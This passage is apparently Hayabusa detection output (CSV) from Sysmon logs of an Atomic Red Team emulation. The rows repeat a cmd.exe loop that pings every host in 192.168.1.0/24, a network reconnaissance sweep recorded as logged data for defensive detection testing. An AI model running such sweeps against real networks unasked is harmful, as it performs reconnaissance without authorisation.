192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.92 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.93 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.94 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.95 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.96 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.97 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.98 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.99 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.100 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.101 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.529 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.102 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.103 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.104 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.105 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.106 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.107 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.108 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.109 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.110 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.111 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.112 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.113 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.114 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.005 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.115 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.116 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.117 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.118 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.119 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.120 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.121 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.122 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.123 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.124 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.125 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.126 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.127 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.514 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.128 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.129 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.130 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.131 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.132 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.133 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.134 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.135 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.136 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.137 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.138 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.139 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.140 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.926 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.141 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.142 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.143 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.144 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.145 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
